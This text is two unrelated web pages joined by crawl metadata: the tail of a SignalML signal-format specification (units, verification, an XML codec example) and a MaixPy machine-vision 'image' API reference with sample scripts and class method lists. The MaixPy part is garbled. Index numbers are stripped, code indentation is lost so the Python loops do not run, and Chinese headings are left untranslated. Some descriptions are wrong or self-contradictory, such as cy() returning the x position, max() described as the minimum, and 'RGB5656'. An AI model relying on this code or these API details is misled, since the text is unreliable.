Identifiers must satisfy the regexp `/[a-zA-Z_][a-zA-Z_0-9]*/`, that is be acceptable identifiers in Python, C, Java…\n\n#### Example: multiplex\n\nThe offset of multiplexed channel sample in a binary file can be written as\n\n```(number_of_channels * sample_number + channel_number) * datatype_width\n```\n\n## Units\n\nTo attach physical units to some parameter the attribute `units=` must be used.\nE.g., to specify a sampling frequency of 100 Hz, one could use\n\n``` ```\n<param id='sampling_frequency' units='Hz'>\n<expr>100</expr>\n</param>\n```\n```\n\nEach parameter is one of the following states in respect to units:\n\n• undefined – an operation was performed which makes no sense when using units\n• with units – some unit is attached to the parameter\n• unitless – a special case of the above, the parameter is a scalar in units of 1.\n\nOnce a unit is set, it propagates according to the following rules (in order of importance)\n\n1. Explicitly setting units with the attribute overrides other rules.\n2. The result of a bit operation is unitless.\n3. The result of any operation with an operand in undefined unit state is in undefined unit state.\n4. The result of `*` or `/` is in the product or quotient of units of operands.\n5. The result of `+`, `-`, `%`, `//` is in the same units as either operand if they are in the same units, or undefined if they are not.\n6. The result of comparison operators is unitless if the operands are in the same units, or undefined if the are not.\n7. The result of slicing is in the same units as the slicee.\n\n### Parsing units\n\nThe string specifying units must be written as a space- (for multiplication) and slash- (for division) and double star- (`**`, for raising to a power) -separated sequence of unit symbols. The precedence of those operators is the same as in expressions.\n\nBase units and prefixes must be used as specified by Bureau International des Poids et Mesures\n\nGreek letters in prefixes and other special letters must be written as-is, using an appropriate encoding (preferably some Unicode serialization) or entity references.\n\nUnits should be specified as a product or a quotient only where the unit has no commonly accepted symbol.\n\nExamples:\n\n1. μV or mV or V for microvolt or millivolt or volt\n2. fT for femtotesla\n3. Ã… or nm or μm for angstrom or nanometer or micrometer\n4. m T/s for meter tesla per second (whatever that is)\n5. m**3 for cubic meters\n\n## Verification\n\nVerification of a SignalML format description can be performed on multiple levels:\n\n1. concordance with the corresponding XMLSchema.\nThe canonical location of the schema is http://signalml.org/SignalML_2_0.xsd\n2. syntactic correctness of the algebraic expressions (contained within attributes, `expr` tags).\n3. conformance to other requirements set in this specification:\n1. all required parameters are defined\n2. expression don’t reference non-existent parameters\n3. parameters have required types\n4. successful execution of the actual data reading and evaluation operations (runtime correctness)\n5. fulfillment of the assertions specified in format description as `assert`s.\n\nPoints one and two and three depend only on the format description. 
Not satisfying points four or five however, can be caused by errors in the description or by the data-files not conforming to the description.\n\n## XML structure\n\n```<?xml version=\"1.0\"?>\n<format>\n<format id='PE-EASYS'/>\n\n<file extension='*.d' type='binary' >\n<param id='datatype_width'>\n<expr>4</expr>\n</param>\n<param id='mapping' type='int'>\n<expr>(number_of_channels * sample_number + channel_number) *\ndatatype_width + 16 * data_offset\n</expr>\n</param>\n\n<param id='magic'>\n<format>|S3</format>\n<offset>0</offset>\n</param>\n<assert id='magic_ok'>\n<expr>magic == \"EAS\"</expr>\n</assert>\n\n<param id='number_of_channels'>\n<format>>i1</format>\n<offset>16</offset>\n</param>\n\n<param id='sampling_frequency' type='float' units='Hz'>\n<expr>_sampling_frequency/100</expr>\n</param>\n<param id='_sampling_frequency'>\n<format>>i4</format>\n<offset>18</offset>\n</param>\n\n<param id='calibration_gain' type='float' units='μV'>\n<expr>_calibration_gain/100</expr>\n</param>\n<param id='_calibration_gain'>\n<format>>i1</format>\n<offset>25</offset>\n</param>\n\n<param id='data_offset'>\n<format>>i2</format>\n<offset>28</offset>\n</param>\n</file>\n</format>\n```\n\nAllowed values of the `type` parameter (type of the file)\n\n ‘binary’ fixed-position with IEEE floating/fixed point ‘xml’ XML file ‘ascii’ an ASCII format\n\n## Format ID\n\nIt would be good to have a well defined formula for the identification and naming the very format, read/defined by the codec. For example, something like in the XML Schemas–a given URI. So for EDF that might be “http://www.edfplus.info/specs/edf.html“–some groups, organizations or companies might like to adhere to this kind of scheme, but even if not, the application might use this ID to create a list of handled formats and group codecs for each of them.\n\nFor this, each codec should return some text info, useful for presenting to the user, e.g.:\n\n• company/organization promoting given data format\n• name of the format\n• version of the format\n\n## Codec ID\n\nIt would be also good to have a unique formula for the identification/description of a codec, including e.g.:\n\n• data format which it describes/defines (e.g. the URI from the above example)\n• unique name of the codec(s) provider (sth. like the above URI, or Java packets notations, in which case EASYS codec that we create and maintain would be org.signalml.EASYS — with absolutely no relation to the Java class which implements it)\n• version number\n\nApplication should not allow to simultaneous installation of two versions of the same codec (according to the above criteria)—such an attempt should be processed as an upgrade.\n\nCurrently, the signalml application uses for this hash of the XML file, from which the codec was created: that’s a bit unnatural, and, in general, a codec does not have to originate from an XML file to be functional.\n\n### Magic\n\nFrom the side of application and users, it would be great to include some kind of “AI” guessing and suggesting the right format/codec based upon the file name and content. So, for the formats that include some kind of “magic” identification fields, we could include this information in the above description/ID." ]
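As a closing illustration of the "magic" idea, a host application might pre-filter candidate codecs by checking such identification fields before evaluating a full description. The sketch below is hypothetical; the only entry in its table mirrors the `magic == "EAS"` assertion from the example description earlier on this page.

```
# Sketch: cheap magic-based format guessing before a codec is fully applied.
# The table is illustrative, not normative.
MAGIC_TABLE = {
    "PE-EASYS": (0, b"EAS"),   # |S3 string at offset 0, as in the example above
}

def guess_formats(path):
    """Return names of formats whose magic bytes match the file."""
    candidates = []
    with open(path, "rb") as f:
        for name, (offset, magic) in MAGIC_TABLE.items():
            f.seek(offset)
            if f.read(len(magic)) == magic:
                candidates.append(name)
    return candidates

# print(guess_formats("recording.d"))
```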
{"ft_lang_label":"__label__en","ft_lang_prob":0.78151137,"math_prob":0.8099035,"size":22887,"snap":"2020-45-2020-50","text_gpt3_token_len":5180,"char_repetition_ratio":0.14333785,"word_repetition_ratio":0.032330617,"special_character_ratio":0.22711582,"punctuation_ratio":0.10483473,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95371175,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-22T05:50:53Z\",\"WARC-Record-ID\":\"<urn:uuid:7497e7b5-1611-4b77-9f1f-07b154594b9c>\",\"Content-Length\":\"108940\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3631a84f-ed51-4e88-84f9-4fe4da890e84>\",\"WARC-Concurrent-To\":\"<urn:uuid:b75acce8-37ce-40f8-b7a9-27d6b410cb9c>\",\"WARC-IP-Address\":\"104.28.26.47\",\"WARC-Target-URI\":\"https://braintech.pl/software/svarog/signalml/?lang=en\",\"WARC-Payload-Digest\":\"sha1:55BWKGOWCX2RQPSPDPXXSNEJL5RQ3CBZ\",\"WARC-Block-Digest\":\"sha1:UEGGRIQGTCDYAIEC7H6LMRJ74CB3NKQZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107878921.41_warc_CC-MAIN-20201022053410-20201022083410-00117.warc.gz\"}"}
https://maixpy.sipeed.com/en/libs/machine_vision/image.html
[ "# Image — machine vision\n\nPorted in `openmv`, same as `openmv`\n\n## 1. Routine\n\n### 1.1. Routine 1: Find green\n\n``````import sensor\nimport image\nimport lcd\nimport time\nlcd.init()\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.run(1)\ngreen_threshold = (0, 80, -70, -10, -0, 30)\nwhile True:\nimg=sensor.snapshot()\nblobs = img.find_blobs([green_threshold])\nif blobs:\nfor b in blobs:\ntmp=img.draw_rectangle(b[0:4])\ntmp=img.draw_cross(b, b)\nc=img.get_pixel(b, b)\nlcd.display(img)\n``````\n\n### 1.2. Routine 2: Display fps\n\n``````import sensor\nimport image\nimport lcd\nimport clock\n\nclock = clock.clock()\nlcd.init()\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.run(1)\nsensor.skip_frames(30)\nwhile True:\nclock.tick()\nimg = sensor.snapshot()\nfps =clock.fps()\nimg.draw_string(2,2, (\"%2.1ffps\" %(fps)), color=(0,128,0), scale=2)\nlcd.display(img)\n``````\n\n### 1.3. Routine 3: Scan QR code\n\n``````import sensor\nimport image\nimport lcd\nimport clock\n\nclock = clock.clock()\nlcd.init()\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.set_vflip(1)\nsensor.run(1)\nsensor.skip_frames(30)\nwhile True:\nclock.tick()\nimg = sensor.snapshot()\nres = img.find_qrcodes()\nfps =clock.fps()\nif len(res) > 0:\nlcd.display(img)\n``````\n\nIf the lens is used, the picture will be distorted and the picture needs to be corrected. Use the `lens_corr` function to correct, such as `2.8`mm, `img.lens_corr(1.8)`\n\n## 2. function\n\nThe function can also press `Ctrl+F` on the page to search for functions using the browser's search function search `image.`\n\n### 2.1. image.rgb_to_lab(rgb_tuple)\n\nReturns the tuple (l, a, b) of the LAB format corresponding to the tuple rgb_tuple (r, g, b) in RGB888 format.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. In LAB, L has a value range of 0-100, and a/b ranges from -128 to 127.\n\n### 2.2. image.lab_to_rgb(lab_tuple)\n\nReturns the tuple (r, g, b) of the RGB888 format corresponding to the tuple lab_tuple (l, a, b) in LAB format.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. In LAB, L has a value range of 0-100, and a/b ranges from -128 to 127.\n\n### 2.3. image.rgb_to_grayscale(rgb_tuple)\n\nReturns the gray value corresponding to the tuple rgb_tuple (r, g, b) in RGB888 format.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. The gray value is from 0 to 255.\n\n### 2.4. image.grayscale_to_rgb(g_value)\n\nReturns the tuple (r, g, b) of the RGB888 format corresponding to the gray value g_value.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. The gray value is from 0 to 255.\n\nLoad a descriptor object from the disk.\n\nPath is the path where the descriptor file is saved.\n\n### 2.6. image.save_descriptor(path, descriptor)\n\nSave the descriptor object descriptor to disk.\n\nPath is the path where the descriptor file is saved.\n\n### 2.7. image.match_descriptor(descritor0, descriptor1[, threshold=70[, filter_outliers=False]])\n\nFor the LBP descriptor, this function returns an integer that represents the difference between the two descriptors. This distance measurement is especially necessary. This distance is a measure of similarity. The closer this measure is to 0, the better the LBPF feature points will match.\n\nFor the ORB descriptor, this function returns the kptmatch object. 
See above.\n\nThreshold is used to filter the ambiguous matching service for the ORB keypoint. A lower threshold value will be tied to the keypoint matching algorithm. The threshold value is at 0-100 (int). The default is 70.\n\nFilter_outliers is used to filter outliers for ORB keypoints. Feature points allow the user to increase the threshold value. The default setting is False.\n\n## 3. HaarCascade Class – Feature Descriptors\n\nThe Haar Cascade feature descriptor is used for the `image.find_features()` method. It has no methods for the user to call.\n\n### 3.1. Constructor\n\nThe stage default is the number of stages in Haar Cascade. However, you can specify a lower value to speed up the running of the feature detector, which of course leads to a higher false positive rate.\n\nA: Haar Cascade is a series of comparison checks used to determine if an object is present in an image. This series of comparison checks is divided into phases, and the operation of the latter phase is premised on the completion of the previous phase. Contrast checks are not complicated, but are like processes that check if the center of the image is slightly more vertical than the edges. A wide range of inspections are carried out first in the early stages, and more small area inspections are carried out later.\n\nA: Haar Cascades trains generator algorithms with positive and negative images. For example, use hundreds of pictures containing cats (marked as containing cats) and hundreds of pictures that do not contain cats (have been marked differently) to train this generation algorithm. This generation algorithm will eventually generate a Haar Cascades for detecting cats.\n\n## 4. Similarity Class – Similarity Object\n\nThe similarity object is returned by `image.get_similarity`.\n\n### 4.1. Constructor\n\nClass image.similarity\n\nCall the image.get_similarity() function to create this object.\n\n#### 方法\n\n##### similarity.mean()\n\nReturns the mean of the similarity difference in 8x8 pixel block structure. Range [-1/+1], where -1 is completely different and +1 is identical.\n\nYou can also get this value via index .\n\n##### similarity.stdev()\n\nReturns the standard deviation of the 8x8 pixel block structure similarity difference.\n\nYou can also get this value via index .\n\n##### similarity.min()\n\nReturns the minimum value of the 8x8 pixel block structure similarity difference. Where -1 is completely different and +1 is identical.\n\nYou can also get this value via index .\n\nBy looking at this value, you can quickly determine if any 8x8 pixel blocks between the two images are very different, which is much lower than +1.\n\n##### similarity.max()\n\nReturns the minimum value of the 8x8 pixel block structure similarity difference. Where -1 is completely different and +1 is identical.\n\nYou can also get this value via index .\n\nBy looking at this value, you can quickly determine if any 8x8 pixel blocks between the two images are the same. That is much larger than -1.\n\n## 5. Histogram Class – Histogram Object\n\nThe histogram object is returned by `image.get_histogram`. A grayscale histogram has a channel that contains multiple binaryes. All binaries are normalized to a total of one. RGB565 has three channels with multiple binary. All binaries are normalized to a total of one.\n\n### 5.1. Constructor\n\nClass image.histogram\n\nPlease call the `image.get_histogram()` function to create this object.\n\n### 5.2. 
方法\n\n#### histogram.bins()\n\nReturns a list of floating point numbers for the grayscale histogram. You can also get this value via index .\n\n#### histogram.l_bins()\n\nReturns a list of floating point numbers for the L channel of the RGB565 histogram LAB. You can also get this value via index .\n\n#### histogram.a_bins()\n\nReturns a list of floating point numbers for the A channel of the RGB565 histogram LAB. You can also get this value via index .\n\n#### histogram.b_bins()\n\nReturns a list of floating point numbers for the B channel of the RGB565 histogram LAB. You can also get this value via index .\n\n#### histogram.get_percentile(percentile)\n\nCalculates the CDF of the histogram channel, returning a value that passes the histogram in percentile (0.0 - 1.0) (floating point).\n\nTherefore, if you pass in 0.1, this method will tell you which binary will cause the accumulator to cross 0.1 when accumulating the accumulator.\n\nThis is effective for determining the minimum (0.1) and max(0.9) of the color distribution when there is no anomalous utility to corrupt your adaptive color tracking results.\n\n#### histogram.get_threhsold()\n\nUse the Otsu’s method to calculate the optimal threshold, dividing each channel of the histogram into two halves. This method returns an image.threshold object. This method is especially useful for determining the best image.binary() threshold.\n\n#### histogram.get_statistics()\n\nCalculates the mean, median, value, standard deviation, minimum, maximum, lower quartile, and upper quartile for each color channel in the histogram and returns a statistics object. You can also use histogram.statistics() and histogram.get_stats() as aliases for this method.\n\n## 6. Percentile Class – Percentage Value Object\n\nThe percentage value object is returned by `histogram.get_percentile`. The grayscale value has one channel. Do not use the l* , a , or b_ methods. The RGB565 percentage value has three channels. Use the l* , a , and b_ methods.\n\n### 6.1. Constructor\n\nClass image.percentile\n\nCall the histogram.get_percentile() function to create this object.\n\n### 6.2. 方法\n\n#### percentile.value()\n\nReturns the grayscale percentage value (value range 0-255).\n\nYou can also get this value via index .\n\n#### percentile.l_value()\n\nReturns the percentage value of the L channel of the RGB565 LAB (value range is 0-100).\n\nYou can also get this value via index .\n\n#### percentile.a_value()\n\nReturns the percentage value of the A channel of the RGB565 LAB (value range -128-127).\n\nYou can also get this value via index .\n\n#### percentile.b_value()\n\nReturns the percentage value of the B channel of the RGB565 LAB (value range -128-127).\n\nYou can also get this value via index .\n\n## 7. Threhsold Class – Threshold Object\n\nThe threshold object is returned by histogram.get_threshold.\n\nThe grayscale image has a channel. There are no l*, a, and b_ methods.\n\nThe RGB565 threshold has three channels. Use the l*, a, and b_ methods.\n\n### 7.1. 
Constructor\n\nClass image.threshold\n\nCall the histogram.get_threshold() function to create this object.\n\n#### threhsold.value()\n\nReturns the threshold of the grayscale image (between 0 and 255).\n\nYou can also get this value via index .\n\n#### threhsold.l_value()\n\nReturns the L threshold in RGB565 map LAB (between 0 and 100).\n\nYou can also get this value via index .\n\n#### threhsold.a_value()\n\nReturns the A threshold in the RGB565 graph LAB (between -128 and 127).\n\nYou can also get this value via index .\n\n#### threhsold.b_value()\n\nReturns the B threshold in RGB565 map LAB (between -128 and 127).\n\nYou can also get this value via index .\n\n## 8. class Statistics – Statistics Object\n\nThe statistics object is returned by histogram.get_statistics or image.get_statistics.\n\nGrayscale statistics have one channel, using non-l*, a, or b_ methods.\n\nThe RGB565 percentage value has three channels. Use the l* , a , and b_ methods.\n\n### 8.1. Constructor\n\nClass image.statistics Call the histogram.get_statistics() or image.get_statistics() function to create this object.\n\n### 8.2. 方法\n\n#### statistics.mean()\n\nReturns the grayscale mean (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.median()\n\nReturns the gray value median (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.mode()\n\nReturns the gray level value (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.stdev()\n\nReturns the gray standard deviation (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.min()\n\nReturns the minimum gray level (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.max()\n\nReturns the grayscale maximum (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.lq()\n\nReturns the quarter value (0-255) (int) under gray.\n\nYou can also get this value via index .\n\n#### statistics.uq()\n\nReturns the grayscale upper quartile (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.l_mean()\n\nReturns the mean (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_median()\n\nReturns the median (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_mode()\n\nReturns the value of L (0-255) (int) in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_stdev()\n\nReturns the standard deviation value (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_min()\n\nReturns the minimum value (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_max()\n\nReturns the maximum value (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_lq()\n\nReturns the lower quartile (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_uq()\n\nReturns the upper quartile (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_mean()\n\nReturns the mean (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_median()\n\nReturns the median (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_mode()\n\nReturns the value of A (0-255) (int) in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### 
statistics.a_stdev()\n\nReturns the standard deviation value (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_min()\n\nReturns the minimum value (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_max()\n\nReturns the maximum value (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_lq()\n\nReturns the lower quartile (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.a_uq()\n\nReturns the upper quartile (0-255) (int) of A in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_mean()\n\nReturns the mean (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_median()\n\nReturns the median (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_mode()\n\nReturns the value of B (0-255) (int) in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_stdev()\n\nReturns the standard deviation (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_min()\n\nReturns the minimum value (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_max()\n\nReturns the maximum value (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_lq()\n\nReturns the lower quartile (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.b_uq()\n\nReturns the upper quartile (0-255) (int) of B in RGB5656 LAB.\n\nYou can also get this value via index .\n\n## 9. Blob class – color block object\n\nThe patch object is returned by `image.find_blobs`.\n\n### 9.1. Constructor\n\nClass image.blob\n\nCall the image.find_blobs() function to create this object.\n\n### 9.2. 方法\n\n#### blob.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the color block bounding box.\n\n#### blob.x()\n\nReturns the x coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.y()\n\nReturns the y coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.w()\n\nReturns the w coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.h()\n\nReturns the h coordinate (int) of the bounding box of the patch.\n\nYou can also get this value via index .\n\n#### blob.pixels()\n\nReturns the number of pixels subordinate to a part of the int.\n\nYou can also get this value via index .\n\n#### blob.cx()\n\nReturns the center x position of the color block (int).\n\nYou can also get this value via index .\n\n#### blob.cy()\n\nReturns the center x position of the color block (int).\n\nYou can also get this value via index .\n\n#### blob.rotation()\n\nReturns the rotation of the patch (in radians). If the color block is similar to a pencil or pen, then this value is a unique value between 0-180. If the color block is round, then this value has no effect. If this color block is completely symmetrical, you can only get a 0-360 degree rotation.\n\nYou can also get this value via index .\n\n#### blob.code()\n\nReturns a 16-bit binary number with one bit set for each color threshold, which is part of the color block. 
For example, if you look for three color thresholds via image.find_blobs, this color block can be set to 0/1/2 digits. Note: You can only set one bit per color block unless you call image.find_blobs with merge=True . Then multiple color patches with different color thresholds can be merged together. You can also use this method and multiple thresholds to implement color code tracking.\n\nYou can also get this value via index .\n\n#### blob.count()\n\nReturns the number of multiple patches that are merged into this patch. This number is not 1 only if you call image.find_blobs with merge=True.\n\nYou can also get this value via index .\n\n#### blob.area()\n\nReturns the border area around the patch (w * h)\n\n#### blob.density()\n\nReturns the density ratio of this patch. This is the number of pixels in the bounding box area of ​​the patch. In general, a lower density ratio means that the object is not locked well.\n\n## 10. Line Class – Straight Line Object\n\nLine objects are returned by `image.find_lines` , `image.find_line_segments` or `image.get_regression`.\n\n### 10.1. Constructor\n\nClass image.line\n\nCall the image.find_lines(), image.find_line_segments(), or image.get_regression() function to create this object.\n\n### 10.2. 方法\n\n#### line.line()\n\nReturns a line tuple (x1, y1, x2, y2) for use with other image methods such as image.draw_line .\n\n#### line.x1()\n\nReturns the p1 vertex x coordinate component of the line.\n\nYou can also get this value via index .\n\n#### line.y1()\n\nReturns the p1 y component of the line.\n\nYou can also get this value via index .\n\n#### line.x2()\n\nReturns the p2 x component of the line.\n\nYou can also get this value via index .\n\n#### line.y2()\n\nReturns the p2 y component of the line.\n\nYou can also get this value via index .\n\n#### line.length()\n\nReturns the length of the line ie sqrt(((x2-x1)^2) + ((y2-y1)^2).\n\nYou can also get this value via index .\n\n#### line.magnitude()\n\nReturns the length of the line after the Hough transform.\n\nYou can also get this value via index .\n\n#### line.theta()\n\nReturns the angle of the line after the Hough transform (0-179 degrees).\n\nYou can also get this value via index .\n\n#### line.rho()\n\nReturns the p value of the line after the Hough transform.\n\nYou can also get this value via index .\n\n## 11. CircleClass - Round Object\n\nThe circular object is returned by `image.find_circles`.\n\n### 11.1. Constructor\n\nClass image.circle\n\nCall the image.find_circles() function to create this object.\n\n### 11.2. 方法\n\n#### circle.x()\n\nReturns the x position of the circle.\n\nYou can also get this value via index .\n\n#### circle.y()\n\nReturns the y position of the circle.\n\nYou can also get this value via index .\n\n#### circle.r()\n\nReturns the radius of the circle.\n\nYou can also get this value via index .\n\n#### circle.magnitude()\n\nReturns the size of the circle.\n\nYou can also get this value via index .\n\n## 12. Rect class – rectangular object\n\nThe rectangle object is returned by `image.find_rects`.\n\n### 12.1. Constructor\n\nClass image.rect\n\nCall the image.find_rects() function to create this object.\n\n### 12.2. 方法\n\n#### rect.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of a rectangular object. 
The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### rect.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the rectangle.\n\n#### rect.x()\n\nReturns the x position of the top left corner of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.y()\n\nReturns the y position of the top left corner of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.w()\n\nReturns the width of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.h()\n\nReturns the height of the rectangle.\n\nYou can also get this value via index .\n\n#### rect.magnitude()\n\nReturns the size of the rectangle.\n\nYou can also get this value via index .\n\n## 13. QRCode Class – QR Code Object\n\nThe QR code object is returned by `image.find_qrcodes`.\n\n### 13.1. Constructor\n\nClass image.qrcode\n\nCall the image.find_qrcodes() function to create this object.\n\n### 13.2. 方法\n\n#### qrcode.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### qrcode.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the bounding box of the QR code.\n\n#### qrcode.x()\n\nReturns the x coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.y()\n\nReturns the y coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.w()\n\nReturns the w coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.h()\n\nReturns the h coordinate (int) of the bounding box of the QR code.\n\nYou can also get this value via index .\n\nReturns a string of the QR code payload, such as a URL.\n\nYou can also get this value via index .\n\n#### qrcode.version()\n\nReturns the version number (int) of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.ecc_level()\n\nReturns the ECC level (int) of the QR code.\n\nYou can also get this value via index .\n\nReturns the mask (int) of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.data_type()\n\nReturns the data type of the QR code.\n\nYou can also get this value via index .\n\n#### qrcode.eci()\n\nReturns the ECI of the QR code. The ECI stores the code for storing the data bytes in the QR code. If you want to process a QR code that contains more than standard ASCII text, you need to look at this value.\n\nYou can also get this value via index .\n\n#### qrcode.is_numeric()\n\nReturns True if the data type of the QR code is numeric.\n\n#### qrcode.is_alphanumeric()\n\nReturns True if the data type of the QR code is alphanumeric.\n\n#### qrcode.is_binary()\n\nReturns True if the data type of the QR code is binary. If you are dealing with all types of text carefully, you need to check if eci is True to determine the text encoding of the data. Usually it's just standard ASCII, but it could also be UTF8 with two byte characters.\n\n#### qrcode.is_kanji()\n\nReturns True if the data type of the QR code is Japanese Kanji. When set to True, you need to decode the string yourself, because the Japanese character is 10 digits per character, and MicroPython does not support parsing such text.\n\n## 14. 
AprilTag类 – AprilTag object\n\nThe AprilTag object is returned by `image.find_apriltags`.\n\n### 14.1. Constructor\n\nClass image.apriltag\n\nCall the image.find_apriltags() function to create this object.\n\n### 14.2. 方法\n\n#### apriltag.corners()\n\nReturns a list of four tuples (x, y) consisting of the four corners of the object. The four corners are usually returned in a clockwise order starting from the upper left corner.\n\n#### apriltag.rect()\n\nReturns a rectangular tuple (x, y, w, h) for other image methods such as image.draw_rectangle of the AprilTag bounding box.\n\n#### apriltag.x()\n\nReturns the x coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.y()\n\nReturns the y coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.w()\n\nReturns the w coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.h()\n\nReturns the h coordinate (int) of the AprilTag bounding box.\n\nYou can also get this value via index .\n\n#### apriltag.id()\n\nReturns the numeric ID of the AprilTag.\n\nTAG16H5 -> 0 to 29 TAG25H7 -> 0 to 241 TAG25H9 -> 0 to 34 TAG36H10 -> 0 to 2319 TAG36H11 -> 0 to 586 ARTOOLKIT -> 0 to 511 You can also get this value via index .\n\n#### apriltag.family()\n\nimage.TAG16H5 image.TAG25H7 image.TAG25H9 image.TAG36H10 image.TAG36H11 image.ARTOOLKIT You can also get this value via index .\n\n#### apriltag.cx()\n\nReturns the center x position (int) of the AprilTag.\n\nYou can also get this value via index .\n\n#### apriltag.cy()\n\nReturns the center y position (int) of the AprilTag.\n\nYou can also get this value via index .\n\n#### apriltag.rotation()\n\nReturns the curl (int) of the AprilTag in radians.\n\nYou can also get this value via index .\n\n#### apriltag.decision_margin()\n\nReturns the color saturation of the AprilTag match (values ​​0.0 - 1.0), where 1.0 is optimal.\n\nYou can also get this value via index .\n\n#### apriltag.hamming()\n\nReturns the acceptable digit error value for the AprilTag.\n\nTAG16H5 -> accepts up to 0 bit errors TAG25H7 -> accepts up to 1 bit error TAG25H9 -> accepts up to 3 bit errors TAG36H10 -> accepts up to 3 bit errors TAG36H11 -> accepts up to 4 errors ARTOOLKIT -> accepts up to 0 bit errors You can also get this value via index .\n\n#### apriltag.goodness()\n\nReturns the color saturation of the AprilTag image (value 0.0 - 1.0), where 1.0 is optimal.\n\nCurrently this value is usually 0.0. In the future, we can enable a feature called \"tag refinement\" to achieve detection of smaller AprilTag. However, this feature now reduces the frame rate below 1 FPS.\n\nYou can also get this value via index .\n\n#### apriltag.x_translation()\n\nReturns the transformation from the x direction of the camera. The unit of distance is unknown.\n\nThis method is useful for determining the position of the AprilTag away from the camera. However, the size of the AprilTag and the factors you use will affect the determination of the X unit ownership. 
For ease of use, we recommend that you use a lookup table to convert the output of this method into information that is useful to your application.\n\nNote: The direction here is from left to right.\n\nYou can also get this value via index .\n\n#### apriltag.y_translation()\n\nReturns the transformation from the y direction of the camera, the unit of distance is unknown.\n\nThis method is useful for determining the position of the AprilTag away from the camera. However, the size of the AprilTag and the factors you use will affect the determination of the Y unit ownership. For ease of use, we recommend that you use a lookup table to convert the output of this method into information that is useful to your application.\n\nNote: The direction here is from top to bottom.\n\nYou can also get this value via index .\n\n#### apriltag.z_translation()\n\nReturns the transformation from the camera's z direction, the unit of distance is unknown.\n\nThis method is useful for determining the position of the AprilTag away from the camera. However, factors such as the size of the AprilTag and the lens you are using will affect the determination of the Z-unit attribution. For ease of use, we recommend that you use a lookup table to convert the output of this method into information that is useful to your application.\n\nNote: The direction here is from front to back.\n\nYou can also get this value via index .\n\n#### 